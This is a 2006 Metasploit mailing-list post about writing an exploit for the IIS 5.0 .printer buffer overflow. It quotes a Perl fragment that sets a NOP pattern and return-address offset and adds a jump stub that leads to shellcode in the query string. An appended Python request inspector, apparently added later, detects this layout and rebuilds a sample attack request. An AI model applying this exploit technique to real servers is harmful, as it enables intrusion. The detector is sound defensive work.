Metasploit mailing list archives

iis50_printer_overflow


From: hdm at metasploit.com (H D Moore)
Date: Thu, 2 Mar 2006 14:57:30 -0600

On Thursday 02 March 2006 14:49, Sonixxfx wrote:
> I am trying to write an exploit for the "iis50_printer_overflow"
> [ snip ]
> The problem seems to be that I have few space available after the
> return address for the payload. I believe there is something about 240
> bytes available. So my question is how can I make use of both the space
> available after the return address but also before the return address?

If you look at our exploit, we cheat. We stick our shellcode into the 
query string and then find it again by dereferencing ebx+96 (which 
happens to be a pointer that, when 256+64 is added to it, leads back 
into our shellcode):

my $pattern = $self->MakeNops(280);
substr($pattern, 268, 4, pack("V", $target->[1]));

# payload is at: [ebx + 96] + 256 + 64
$pattern .= "\x8b\x4b\x60";         # mov ecx, [ebx + 96]
$pattern .= "\x80\xc1\x40";         # add cl, 64
$pattern .= "\x80\xc5\x01";         # add ch, 1
$pattern .= "\xff\xe1";             # jmp ecx

my $request = "GET http://$pattern/null.printer?$shellcode...


> B.t.w. Nice looking man this morning on your website Metasploit ;)
That lovely image appears if you browse the web site with a hostname that 
doesn't appear to be 'metasploit.com' or one of our other domains. Let me 
know what URL you used to access the web site - it could be a bug. The 
purpose is to prevent people from hotlinking to images we host on our 
server. 

-HD
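For readers on the defending side, the message above also describes exactly what this request looks like on the wire: an absolute-URI GET whose host portion is hundreds of bytes of filler with a return address at offset 268 followed by the 11-byte stage-0 stub, and a query string that carries the payload. The following is an added example, not code from this thread or from the Metasploit module, that turns that description into a simple request-line inspector with constructed sample requests (the length and sled thresholds and the `XXXX` / `0xCC` placeholders are assumptions, not values from the page).

```python
import re

# Stage-0 stub bytes quoted in the thread:
# mov ecx,[ebx+96]; add cl,64; add ch,1; jmp ecx
JMP_STUB = b"\x8b\x4b\x60\x80\xc1\x40\x80\xc5\x01\xff\xe1"

# The thread places the return address at offset 268 of a 280-byte host field,
# so a host portion longer than this (an assumed cutoff) is far outside any
# legitimate hostname.
HOST_LEN_THRESHOLD = 256
NOP_SLED_MIN = 32  # assumed: this many consecutive 0x90 bytes is treated as a sled

# Absolute-URI request line: METHOD http://<host>/<path>[?<query>] HTTP/1.x
REQ_LINE = re.compile(
    rb"^(?P<method>[A-Z]+) http://(?P<host>[^/\s]*)"
    rb"(?P<path>/[^\s?]*)(?:\?(?P<query>\S*))? HTTP/1\.[01]\r?\n"
)


def inspect_request(raw):
    """Return a list of finding strings for one raw request line (bytes); empty if clean."""
    findings = []
    m = REQ_LINE.match(raw)
    if not m:
        return findings
    host = m.group("host")
    path = m.group("path")
    query = m.group("query") or b""

    # Overlong host aimed at the .printer ISAPI extension.
    if path.lower().endswith(b".printer") and len(host) > HOST_LEN_THRESHOLD:
        findings.append("oversized host in .printer request: %d bytes" % len(host))
    # Long run of 0x90 filler in the host field.
    if re.search(b"\x90{%d,}" % NOP_SLED_MIN, host):
        findings.append("NOP sled in host field")
    # The exact stub bytes from the thread, placed after the return-address slot.
    if JMP_STUB in host:
        findings.append("known stage-0 jump stub in host field")
    # A query string is where the thread says the payload is carried; raw bytes
    # outside printable ASCII are not something a browser or printer client sends.
    if query and any(b < 0x20 or b > 0x7E for b in query):
        findings.append("non-printable bytes in query string")
    return findings


# Constructed samples (not captured traffic). The suspect request mirrors the layout
# described in the thread: 268 filler bytes, a 4-byte placeholder where the return
# address would sit, the rest of the filler, then the stub; the query holds a run of
# 0xCC bytes as a stand-in for a payload.
BENIGN = b"GET http://printer.example.test/null.printer HTTP/1.0\r\n"
_filler = b"\x90" * 280
_host = _filler[:268] + b"XXXX" + _filler[272:] + JMP_STUB
SUSPECT = b"GET http://" + _host + b"/null.printer?" + b"\xcc" * 40 + b" HTTP/1.0\r\n"

if __name__ == "__main__":
    for label, req in (("benign", BENIGN), ("suspect", SUSPECT)):
        print(label, inspect_request(req) or ["no findings"])
```

The four checks are deliberately independent so that each one still fires if the others are evaded: the length and sled checks catch any variant of the overflow regardless of the stub used, while the stub-bytes match ties a hit to the specific technique quoted in this thread.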


